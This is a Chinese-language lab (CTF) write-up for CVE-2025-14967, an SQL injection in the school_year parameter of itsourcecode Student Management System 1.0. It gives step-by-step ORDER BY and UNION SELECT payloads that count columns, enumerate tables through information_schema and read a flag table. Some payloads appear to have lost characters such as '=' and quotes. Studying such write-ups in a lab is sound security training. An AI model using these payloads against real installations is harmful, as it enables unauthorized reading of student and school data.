[春秋云镜] CVE-2025-14967

发布时间:2026/7/23 5:18:56

[春秋云镜] CVE-2025-14967 一、靶场环境与漏洞简介itsourcecode Student Management System 1.0 存在一个SQL注入漏洞位于 /candidates_report.php 文件的打印功能中。二、注入点确认与字段数量探测1.开启靶场后直接进入2.访问目标页面/candidates_report.php页面参数school_year存在字符型 SQL 注入漏洞。3.使用order by语句暴力猜解查询字段总数 传入 Payload?school_year1 order by 24 --页面抛出 SQL 执行错误 传入 Payload?school_year1 order by 23 --页面正常加载。 由此判断后端原始 SQL 查询语句共23 个字段。利用回显位搭配database()函数读取网站当前连接数据库名Payload 如下?school_year1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,database(),22,23 --三、枚举数据库内全部数据表MySQL 5.0 及以上版本自带系统库information_schema存储所有库、表、字段元数据通过该库查询grading_db下所有数据表payload?school_year1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,table_name,22,23 from information_schema.tables where table_schemagrading_db --五、读取 flag 字段完成通关替换第 21 列为字段名flag直接查询表内密钥数据最终 Payload?school_year1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,flag,22,23 from flag --

相关新闻